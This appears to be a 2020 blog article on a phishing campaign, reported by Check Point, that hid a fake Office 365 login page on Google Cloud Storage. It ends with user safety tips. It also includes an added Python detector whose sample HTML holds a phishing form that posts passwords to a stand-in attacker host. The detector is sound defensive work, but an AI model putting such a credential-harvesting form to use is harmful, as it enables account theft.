Threat Actors Exploited Google Clouds to Launch Phishing Attacks


21 August 2020, Kathmandu

Sometimes we are unable to comprehend the advancement the world is making in terms of digital transformation. And when we choose to ignore the threats that come with it, it is often too late. A report from Check Point Research described a phishing attack that exploited Google Cloud.

Yes! The clouds may not be the safest place, after all.

Threat actors were found exploiting Google Cloud to host malicious payloads and launch phishing attacks.

Google may have dealt with this vulnerability, but it is up to us to stay vigilant and protect our data. In this article, we will also discuss some ways you can do that, especially on cloud services.

Let’s break down the Google Cloud Phishing Journey.

How did it Happen?

First, threat actors uploaded a PDF to Google Drive. They disguised the PDF to resemble a Microsoft SharePoint notice, but in reality, it contained a link to an MS Access Document.

[Image: the PDF the actors uploaded to Google Drive. Source: Check Point]

Once clicked, the link redirected the user to a phishing page hosted on storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html.

The phishing page would then prompt the user to log in with their Office 365 or organization email and password.

After the user entered the login credentials, the page redirected to a real PDF report published by a renowned global consulting firm.

And, that’s the trick! Users wouldn’t be suspicious even for a second because they would think that they were viewing something useful.

It also helps the attackers that the phishing page is hosted on Google Cloud Storage.

It is also difficult for security professionals to identify or detect such phishing campaigns for the same reason.

“However, viewing the phishing page’s source code has revealed that most of the resources are loaded from a website that belongs to the attackers, prvtsmtp[.]com,” the report stated.


After further investigation of the website, researchers found that it resolved to a Ukrainian IP address.
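The tell described above, a login form served from shared cloud storage while its resources come from some other host, can be checked automatically. The following is an added example, not code from Check Point or from the original article; the bucket name, `attacker.example` and the sample HTML are constructed placeholders, and posting the form to the foreign host is an assumption of the sample.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Multi-tenant hosts where the domain name says nothing about who owns the page.
SHARED_HOSTS = {"storage.googleapis.com"}

class PageScan(HTMLParser):
    """Collect hosts the page loads resources from or posts forms to."""
    def __init__(self):
        super().__init__()
        self.hosts = set()
        self.has_password_field = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True
        if tag == "a":
            return  # ordinary links are not loaded with the page
        for name in ("src", "href", "action"):
            host = urlparse(a.get(name) or "").hostname
            if host:
                self.hosts.add(host.lower())

def assess(page_url, html):
    """Flag a credential form on shared storage that pulls in off-host resources."""
    page_host = (urlparse(page_url).hostname or "").lower()
    scan = PageScan()
    scan.feed(html)
    foreign = sorted(h for h in scan.hosts if h != page_host)
    suspicious = (page_host in SHARED_HOSTS and scan.has_password_field
                  and bool(foreign))
    return {"suspicious": suspicious, "foreign_hosts": foreign}

# Constructed sample: bucket name and attacker.example are placeholders.
SAMPLE_URL = "https://storage.googleapis.com/example-bucket/index.html"
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="https://attacker.example/css/login.css">
<script src="//attacker.example/js/main.js"></script>
</head><body>
<form action="https://attacker.example/post.php" method="post">
<input type="email" name="user"><input type="password" name="pass">
</form></body></html>
"""

if __name__ == "__main__":
    print(assess(SAMPLE_URL, SAMPLE_HTML))
```

This is a triage heuristic: a legitimate page on shared storage that uses a third-party CDN would also be flagged, so the listed hosts still need a human look.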

What Next?

Well, Google has a zero-tolerance policy. So, it immediately suspended the phishing URL and all those associated with it.

There have also been incidents in the past where threat actors hosted phishing pages using Dropbox and Microsoft Azure.


How To Prevent Such Phishing Attacks?

Check Point also suggested some precautionary measures to protect users against such phishing attacks.

Have a look at the following points:

  • Beware of lookalike domains and spelling errors. Unfamiliar email senders and spelling errors are a straight giveaway.
  • Be cautious when opening or downloading files received via email from unknown senders. Try to make sense of any suspicious call-to-action and subject line.
  • Ensure that you order products/services from an authentic source. One way to do that could be NOT clicking on promotional links in emails. Try to Google the desired service instead.
  • Beware of ‘special’ offers that could be nothing but a scam. For instance, ‘an exclusive cure for coronavirus for $150’. That should be a dead giveaway.
  • Try to use separate passwords for different applications and accounts.

As they say, “Users’ mailboxes are the front door into your organization.”

Email security has become a necessity, and it needs proper attention in an organization’s architecture.

How often do you come across such potential scams or suspicious emails?

Do let us know in the comments!
